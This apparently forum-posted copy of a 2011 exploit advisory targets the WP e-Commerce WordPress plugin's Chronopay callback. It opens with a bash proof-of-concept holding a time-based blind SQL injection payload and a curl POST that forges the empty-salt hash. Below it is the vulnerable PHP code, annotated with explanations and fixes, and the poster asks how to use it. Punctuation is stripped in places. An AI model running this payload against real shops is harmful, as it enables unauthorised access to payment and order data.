What do I do here?
#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload md5sum tr -d 'n' sed 'ss-sg' md5sum tr -d 'n' sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill httpwww.[redacted].comchronopay_callback=true
---------------
Vulnerable code
---------------
.wp-e-commercewp-shopping-cart.php
class WP_eCommerce {
function WP_eCommerce() {
add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
}
function init() {
...
$this-load();
...
}
function load() {
...
wpsc_core_load_gateways();
...
}
...
$wpec = new WP_eCommerce();
.wp-e-commercewpsc-corewpsc-functions.php
function wpsc_core_load_gateways() {
global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
$gateway_directory = WPSC_FILE_PATH . 'wpsc-merchants';
$nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
$num = 0;
foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
require( WPSC_FILE_PATH . 'wpsc-merchants' . $nzshpcrt_merchant );
}
.wp-e-commercewpsc-merchantschronopay.php
// Chronopay payment-gateway callback, hooked on WordPress 'init' (see the add_action
// call that follows this function in the excerpt). It runs for any request carrying
// chronopay_callback=true and cs2=chronopay; every value it reads below comes from
// the unauthenticated request, so the hash check is the only gate in front of the query.
function nzshpcrt_chronopay_callback()
{
...
if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
{
// Shared secret that is supposed to authenticate the callback. Per the author's note
// below it defaults to '' unless an administrator sets the Chronopay security key, and
// nothing here rejects an empty salt. Mitigation: return early when get_option() yields
// '' or false, so an unconfigured gateway cannot be driven by this endpoint at all.
$salt = get_option('chronopay_salt');
- this is by default '' and set only if explicitly stated
inside Store Settings-Payments-General Settings-
Chronopay-Edit-Security Key
- problem is that there are more popular payment gateways enlisted (e.g.
Google Checkout and PayPal) and if that setting is not explicitly set
it wide opens the door to the potential attacker
// Expected signature over the request-supplied cs1. A keyed MAC (hash_hmac) with a
// mandatory non-empty key is the conventional construction; with an empty salt this
// value only proves the sender knows the hashing scheme, not that it is Chronopay.
$gen_hash = md5($salt . md5($_POST['cs1'] . $salt));
// Loose == comparison of two strings; use hash_equals($gen_hash, (string) $_POST['cs3'])
// for a strict, constant-time check, and treat a missing cs3 as a failure.
if($gen_hash == $_POST['cs3'])
{
...
// trim()/stripslashes() are not SQL escaping: these values reach the UPDATE below verbatim.
$sessionid = trim(stripslashes($_POST['cs1']));
$transaction_id = trim(stripslashes($_POST['transaction_id']));
$verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
$verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
switch($verification_data['trans_type'])
{
...
case 'rebill'
// $transaction_id and $sessionid are concatenated straight into the SQL string, which
// is the injection the PoC at the top of the page exercises. Fix: build the statement
// with $wpdb->prepare() using %s placeholders for both values and pass the result to
// $wpdb->query(); never interpolate request data into the query text.
$wpdb-query(UPDATE `.WPSC_TABLE_PURCHASE_LOGS.` SET
`processed` = '2',
`transactid` = '.$transaction_id.',
`date` = '.time().'
WHERE `sessionid` = .$sessionid. LIMIT 1);
...
add_action('init', 'nzshpcrt_chronopay_callback');
# 1337day.com [2011-09-13]
Anyone?